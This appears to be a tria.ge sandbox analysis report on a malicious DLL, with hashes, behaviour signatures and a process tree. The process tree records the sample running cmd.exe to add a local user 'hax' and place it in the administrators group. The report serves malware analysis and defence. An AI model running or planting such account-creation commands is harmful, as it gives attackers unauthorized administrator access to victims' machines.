Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
91s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
12/02/2024, 02:46
Static task
static1
Behavioral task
behavioral1
Sample
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
Resource
win10v2004-20231215-en
General
-
Target
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll
-
Size
523KB
-
MD5
4343b9f0e1e7c48438540363710bb73d
-
SHA1
83407f59bc3e32b25405675c4b05b2e7f8156421
-
SHA256
7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056
-
SHA512
6a7222b8741682d8d6bab5c28225f26f985944eab0657a0eb07eb4d75d395554d8b859c11030440aaf7829e9ce14f03cbc62d09a350a424bc604ab70b3a08c40
-
SSDEEP
6144:vif0g6k/mf3vpjfUnvCstwmeiUJ5s/yna2i35PFJF/h7yQ6:vK0gjmf3xfU6suxjTs/QbitX/
Malware Config
Signatures
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Runs net.exe
-
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1204 wrote to memory of 3440 1204 rundll32.exe 84 PID 1204 wrote to memory of 3440 1204 rundll32.exe 84 PID 3440 wrote to memory of 2620 3440 cmd.exe 86 PID 3440 wrote to memory of 2620 3440 cmd.exe 86 PID 2620 wrote to memory of 3604 2620 net.exe 87 PID 2620 wrote to memory of 3604 2620 net.exe 87 PID 3440 wrote to memory of 3276 3440 cmd.exe 88 PID 3440 wrote to memory of 3276 3440 cmd.exe 88 PID 3276 wrote to memory of 2164 3276 net.exe 89 PID 3276 wrote to memory of 2164 3276 net.exe 89
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\7ac7ebc5884f6bbf049513de2c0384a9ff6f15194c23e66c23378010ec3a4056.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:1204 -
C:\Windows\system32\cmd.exe/K net user /add hax hax && net localgroup administrators hax /add2⤵
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\system32\net.exenet user /add hax hax3⤵
- Suspicious use of WriteProcessMemory
PID:2620 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user /add hax hax4⤵PID:3604
-
-
-
C:\Windows\system32\net.exenet localgroup administrators hax /add3⤵
- Suspicious use of WriteProcessMemory
PID:3276 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup administrators hax /add4⤵PID:2164
-
-
-